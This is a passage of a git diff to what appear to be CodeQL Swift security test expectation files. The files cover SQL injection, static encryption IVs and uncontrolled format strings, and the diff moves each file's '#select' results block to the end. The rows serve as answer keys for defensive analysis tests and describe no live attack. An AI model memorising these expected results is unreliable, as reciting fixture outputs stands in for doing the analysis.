String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected index 688f7cb4e987..02fdbe6a6a48 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected +++ b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected @@ -1,33 +1,3 @@ -#select -| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | edges | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:68:104:68:104 | myConstIV1 | provenance | | | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:77:125:77:125 | myConstIV1 | provenance | | @@ -117,3 +87,33 @@ nodes | test.swift:167:22:167:22 | iv | semmle.label | iv | | test.swift:168:22:168:22 | iv | semmle.label | iv | subpaths +#select +| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 5e76f12687d2..94dd27a82c2f 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -1,27 +1,3 @@ -#select -| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | edges | UncontrolledFormatString.swift:77:12:77:22 | format | UncontrolledFormatString.swift:78:22:80:5 | format | provenance | | | UncontrolledFormatString.swift:78:22:80:5 | format | UncontrolledFormatString.swift:78:22:80:5 | { ... } [format] | provenance | | @@ -96,3 +72,27 @@ nodes | UncontrolledFormatString.swift:154:26:154:26 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:156:32:156:32 | tainted | semmle.label | tainted | subpaths +#select +| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. | 